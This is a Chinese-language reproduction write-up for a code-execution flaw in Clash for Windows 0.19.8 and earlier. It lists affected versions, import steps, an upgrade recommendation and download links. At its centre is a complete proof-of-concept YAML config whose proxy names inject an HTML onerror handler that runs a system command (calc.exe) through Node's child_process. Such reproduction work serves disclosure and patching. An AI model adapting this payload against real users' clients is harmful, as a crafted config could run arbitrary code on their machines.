00x1-受影响版本

版本:小于等于 0.19.8

平台:视窗

操作系统细节:Windows 10

00x2-漏洞复现

复现环境下载地址

1
https://github.com/Fndroid/clash_for_windows_pkg/releases

漏洞poc地址

1
https://github.com/Fndroid/clash_for_windows_pkg/issues/2710

根据自己计算机系统下载相应的版本,建议下载0.19.8版本(但是现在的版本已经被更新到最新的版本)

最新版本

image-20220227121331113

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true

proxy-groups:
  -
    name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
    - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

新建一任意txt将文本写进去后将文件后缀改为.yaml即可

导入poc文件,直接拖入或者选择导入都可以

直接点击Proxies运行

命令执行成功

00x3-修复建议

直接去更新官方最新升级版本:v 0.19.10

1
https://github.com/Fndroid/clash_for_windows_pkg/releases

00x4-复现环境

1
2
链接:https://pan.baidu.com/s/1XhgBFSLuP2EpW9azRGgdKg?pwd=li4h 
提取码:li4h